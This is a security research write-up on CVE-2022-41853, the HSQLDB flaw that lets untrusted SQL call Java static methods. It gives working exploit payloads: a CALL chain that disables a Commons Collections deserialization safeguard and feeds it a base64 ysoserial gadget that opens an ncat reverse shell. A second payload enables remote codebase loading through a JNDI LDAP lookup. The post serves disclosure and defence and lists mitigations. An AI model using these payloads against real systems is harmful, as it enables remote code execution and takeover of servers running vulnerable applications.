Research into CVE-2022-41853: Using static functions to obtian RCE via Java Deserialization & Remote Codebase Attack
Those using java.sql.Statement or java.sql.PreparedStatement in hsqldb (HyperSQL DataBase) to process untrusted input may be vulnerable to a remote code execution attack. By default it is allowed to call any static method of any Java class in the classpath resulting in code execution. The issue can be prevented by updating to 2.7.1 or by setting the system property "hsqldb.method_class_names" to classes which are allowed to be called. For example, System.setProperty("hsqldb.method_class_names", "abc") or Java argument -Dhsqldb.method_class_names="abc" can be used. From version 2.7.1 all classes by default are not accessible except those in java.lang.Math and need to be manually enabled.
The initial disclosure for this vulnerability can be found here.
OSS-Fuzz team
https://github.com/google/oss-fuzz
Back in 2021, I was reading the blogpost "Remote Code Execution in F5 Big‑IP" by Mikhail Klyuchnikov on how a path normalization attack + HSQL "CALL" queries could be used in order to call arbitrary Java Static methods in order to obtain RCE.
As, at the time, I was reporting and researching vulnerabilities in Apache SOLR, I remembered that their JDBC Stream example uses HSQL and got to setting up the testing environment.
Note: Unfortunatly, this vulnerability does not affect default Apache Solr servers as the HSQL JAR needs to be specifically placed in the folder “./server/solr-webapp/webapp/WEB-INF/lib/” in order for the driver to be reachable by the Stream JDBC component.
Because the RCE in F5 uses the "com.f5.view.web.pagedefinition.shuffler.Scripting.setRequestContext" function located in the "tmui.jar" (a JAR specific to F5 applications), and I wanted to come up with an application independent payload, I got to looking into how I could chain commonly used JARs (e.g. Apache Commons Collections, Apache Log4J) in order to call static functions and obtain RCE.
As the CommonsCollections* gadgets from ysoserial were the first thing to come to mind, I went down the route of Java Deserialization with the following results:
- Call
java.lang.System.setProperty('org.apache.commons.collections.enableUnsafeSerialization','true')in order to enable unsafe deserialization (Why bypass when you can remove a safeguard entirely :)) ) - Use the
public static <T> T org.apache.commons.lang.SerializationUtils.deserialize(byte[] objectData)as a sink for our input to reach theObjectInputStream(x).readObject()function - Use functions
public static byte[] org.apache.logging.log4j.core.config.plugins.convert.parseBase64Binary(String encoded)orpublic static byte[] org.apache.logging.log4j.core.config.plugins.convert.parseHexBinary(String s)in order to turn our encoded ysoserial payload String into a byte array that will be ingested bydeserialize(byte[] objectData)
The full HSQL payload has the following form:
CALL "java.lang.System.setProperty"('org.apache.commons.collections.enableUnsafeSerialization','true') + "org.apache.commons.lang.SerializationUtils.deserialize"("org.apache.logging.log4j.core.config.plugins.convert.Base64Converter.parseBase64Binary"('rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABXNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB+AAN4cHZyABFqYXZhLmxhbmcuUnVudGltZQAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAnQACmdldFJ1bnRpbWV1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAB0AAlnZXRNZXRob2R1cQB+ABsAAAACdnIAEGphdmEubGFuZy5TdHJpbmeg8KQ4ejuzQgIAAHhwdnEAfgAbc3EAfgATdXEAfgAYAAAAAnB1cQB+ABgAAAAAdAAGaW52b2tldXEAfgAbAAAAAnZyABBqYXZhLmxhbmcuT2JqZWN0AAAAAAAAAAAAAAB4cHZxAH4AGHNxAH4AE3VyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ABxuY2F0IC1lIC9iaW4vYmFzaCAxMjcuMSA0NDQ0dAAEZXhlY3VxAH4AGwAAAAFxAH4AIHNxAH4AD3NyABFqYXZhLmxhbmcuSW50ZWdlchLioKT3gYc4AgABSQAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAABc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAAAHcIAAAAEAAAAAB4eHg='))
Note: In this case the ysoserial payload is of type CommonsCollection6 and will execute the ncat -e /bin/bash 127.1 4444 reverse shell command.
Note 2: The standalone HSQLDB.jar is not vulnerable to this payload as it does not include the Apache Commons Collections JAR. This vulnerability works (most of the time) when HSQL is included in a web application (e.g. SOLR, Liferay, etc.)
More details and the exploitation process can be found in this PDF.
Reading up on this subject in 2023, I stumbled accross this awesome presentation Exploring JNDI Attacks by iSafeBlue that used java.lang.System.setProperty to set com.sun.jndi.ldap.object.trustURLCodebase or com.sun.jndi.rmi.object.trustURLCodebase to true and then perform a LDAP/RMI lookup in order to successfully perform a Java Remote Codebase attack.
Example HSQL Payload:
CALL java.lang.System.setProperty"('com.sun.jndi.ldap.object.trustURLCodebase','true') + "javax.naming.InitialContext.doLookup"('ldap://127.0.0.1:4444/pgesux')
Result:
Note: Due to unknown reasons this vulnerablity works on the default HSQLDB.jar, but it doesn't work in the HSQL + Apache SOLR environment ¯\_(ツ)_/¯.